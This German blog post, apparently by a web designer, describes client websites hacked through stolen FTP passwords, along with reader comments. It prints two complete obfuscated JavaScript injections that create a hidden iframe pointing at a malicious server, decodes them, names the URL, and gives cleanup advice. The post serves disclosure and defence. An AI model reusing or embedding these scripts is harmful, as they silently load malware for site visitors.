In den letzten Wochen wurden nach 13 Jahren als Webdesigner gleich mehrere meiner Kundenhomepages gehackt. In Ermangelung irgendwelcher ernstzunehmender Treffer und Abhilfe via Google poste ich hier mal die genauen Symptome. Der Hack erfolgt anscheinend mittels eines gestohlenen FTP-Passworts. Die Verbindung kam laut FTP-Log immer von der IP 46.203.98.175 in der Ukraine – vermutlich ein Zombie PC.
Der Angriff dauerte immer wenige Minuten. Die Dateien wurden anscheinend von hand heruntergeladen und mit einem bösen verschlüsselten Javascript versehen wieder hochgeladen. Betroffen sind meistens die Dateien index.html bzw. index.php in Gambio Shops oder auf wp-blog-header.php in WordPress.
Website gehackt mit Iframe Exploit – Hier einige Beispielcodes des eingefügten Javascripts:
<script>var RSx = '06d06503b06d06506806d06506506d06507106d06506006d06506c06d06506406d06501f06d06507206d06507106d06506206d06503c06d06502106d06502106d06501f06d06507606d06506806d06506306d06507306d06506706d06503c06d06502106d06503006d06502106d06501f06d06506706d06506406d06506806d06506606d06506706d06507306d06503c06d06502106d06503006d06502106d06501f06d06506806d06506306d06503c06d06502106d06504b06d06505606d06506e06d06502106d06501f06d06506506d06507106d06506006d06506c06d06506406d06506106d06506e06d06507106d06506306d06506406d06507106d06503c06d06502106d06502f06d06502106d06503d06d06503b06d06502e06d06506806d06506506d06507106d06506006d06506c06d06506406d06503d';function Kho(Wg,w1,w2){var Obt='';arr=Wg.split('0'+w1+'0'+w2+'0');for(i=1; i<arr.length; i++){ Obt+='%'+(parseInt(arr[i], 16)+1).toString(16);}return Obt;} var zOF=unescape;document.write(zOF(Kho(RSx,'6d','65')));document.getElementById('LWo').src = zOF(Kho('03406e06703406e07303406e07303406e06f03406e03903406e02e03406e02e03406e03003406e03303406e03503406e02d03406e03003406e03703406e03403406e02d03406e03103406e03303406e03803406e02d03406e03003406e02f03406e03603406e02e03406e07203406e07503406e02e03406e06203406e06e03406e07403406e06d03406e07303406e02d03406e06f03406e06703406e06f03406e03e03406e06003406e06303406e06303406e03c03406e030','34','6e'));</script>oder auch
<script>var nhT = '06106903b06106906806106906506106907106106906006106906c06106906406106901f06106907206106907106106906206106903c06106902106106902106106901f06106907606106906806106906306106907306106906706106903c06106902106106903006106902106106901f06106906706106906406106906806106906606106906706106907306106903c06106902106106903006106902106106901f06106906806106906306106903c06106902106106904806106906706106904b06106902106106901f06106906506106907106106906006106906c06106906406106906106106906e06106907106106906306106906406106907106106903c06106902106106902f06106902106106903d06106903b06106902e06106906806106906506106907106106906006106906c06106906406106903d';function FB(dmz,w1,w2){var FkG='';arr=dmz.split('0'+w1+'0'+w2+'0');for(i=1; i<arr.length; i++){ FkG+='%'+(parseInt(arr[i], 16)+1).toString(16);}return FkG;} var eNQ=unescape;document.write(eNQ(FB(nhT,'61','69')));document.getElementById('IhL').src = eNQ(FB('03107306703107307303107307303107306f03107303903107302e03107302e03107303003107303303107303503107302d03107303003107303703107303403107302d03107303103107303303107303803107302d03107303003107302f03107303603107302e03107307203107307503107302e03107306203107306e03107307403107306d03107307303107302d03107306f03107306703107306f03107303e03107306003107306303107306303107303c031073030','31','73'));</script>Beide Website Hacks mit Iframe Exploit sind vom System her gleich, aber unterschiedlich verschlüsselt, daher so nicht in Google auffindbar. Beide geben entschlüsselt den gleichen HTML/Javascript-Code aus. Der erste Teil ergibt
<iframe src="" width="1" height="1" id="IhL" frameborder="0"></iframe>
Der zweite Teil gibt dem bisher leeren Iframe via Javascript eine src-Angabe hinzu. Diese lautet http://146.185.249.107/sv/count.php?add=1 – Bitte nicht besuchen! Das ist Gift!
Ihr habt einen ähnlichen Website-Hack mit Iframe-Exploit? Als erstes solltet ihr via FTP eure FTP-logfiles checken. Alle Modifikationen betrafen bei meinen Kunden vor allem index.php / index.html Dateien. Der Website-Hack mit Iframe-Exploit erfolgte binnen weniger Minuten, die Dateien wurden anscheinend live mit Hand geändert. Findet alle diese Dateien, säubert sie und setzt danach unbedingt alle Server-Admin und FTP-Passwörter auf neue sichere Werte!
Die eine Frage bleibt: Wie ist der Hacker an die FTP-Passwörter gekommen? Ich hab jetzt viel gelesen, hab mein System mit zahlreichen Scannern untersucht. Alles sauber. Aber irgendwoher muss der Hacker die FTP-Passwörter haben. Kunden-PCs sind angeblich auch sauber. Wessen Website wurde noch auf ähnliche Weise gehackt? Gaben eure Scanner irgendwas aus?
Nach Analyse einer infizierten Site erhalte ich folgenden Hinweis: http://sucuri.net/malware/malware-entry-mwjs160
Website gehackt mit Iframe Exploit…Ende
Rate it!
Loading...
Frank Woelky, Jahrgang ’73. Kitesurfer seit 1998. Seit 2006 bringe ich Kitesurfen und Webdesign auf mehrmonatigen Reisen abseits ausgetretener Pfade unter einen Hut. Letzte große Reise: 
Hiho,
Du hast vermutlich das FTP-Passwort auf Deinem Rechner im FTP-Programm gespeichert, und vermutlich wird das Filezilla oder WinSCP gewesen sein. Waren beide Programme anfällig für das Auslesen des Passworts.
Dann bist Du wohl selbst auf eine Seite mit iframe-exploit gekommen, da hats Dir dann die FTP-Passwörter Daten ausgelesen und an alle index-Dateien das javascript angefügt (automatisch, nicht von Hand….).
Ist mir auch passiert =). FTP-Passwörter ändern nicht vergessen!
Grüssle!
Hey,
der zitierte Code lässt mein Avast! Alarm schlagen!
Vielleicht besser als Bild einbinden ;-)